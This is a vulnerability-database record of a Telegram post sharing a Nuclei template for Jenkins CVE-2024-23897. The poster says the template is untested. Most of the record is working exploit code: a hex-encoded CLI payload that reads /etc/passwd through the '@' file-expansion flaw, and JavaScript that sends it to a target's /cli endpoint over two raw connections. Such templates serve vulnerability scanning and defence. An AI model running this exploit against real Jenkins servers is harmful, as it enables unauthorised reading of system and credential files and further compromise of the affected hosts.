{"uuid": "79e46fa9-fb53-4738-a6da-4644fb7ff045", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3620", "content": "Jenkins nuclei-template\nRCE Arbitrary File Read CVE-2024-23897\n\nNot officially added to nuclei-template yet. I haven't tested it yet. Nothing to test it on \ud83d\ude22\n\nid: CVE-2024-23897\n\ninfo:\n  name: Jenkins < 2.441 - Arbitrary File Read\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: critical\n  description: |\n    Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.\n  reference:\n    - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314\n  tags: cve,cve2024,lfi,rce,jenkins\n\nvariables:\n  payload: \"{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}\"\n\njavascript:\n  - code: |\n      let m = require('nuclei/net');\n      let name=(Host.includes(':') ? Host : Host+\":80\");\n      let conn,conn2;\n      try { conn = m.OpenTLS('tcp', name) } catch { conn=  m.Open('tcp', name)}\n      conn.Send('POST /cli?remoting=false HTTP/1.1\\r\\nHost:'+Host+'\\r\\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\\r\\nSide: download\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\n\\r\\n');\n      try { conn2 = m.OpenTLS('tcp', name) } catch { conn2=  m.Open('tcp', name)}\n      conn2.Send('POST /cli?remoting=false HTTP/1.1\\r\\nHost:'+Host+'\\r\\nContent-type: application/octet-stream\\r\\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\\r\\nSide: upload\\r\\nConnection: keep-alive\\r\\nContent-Length: 163\\r\\n\\r\\n'+Body)\n      resp = conn.RecvString(1000)\n    args:\n      Body: \"{{payload}}\"\n      Host: \"{{Hostname}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(response, \"No such agent \\\"\")'\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-01-26T11:17:31.000000Z"}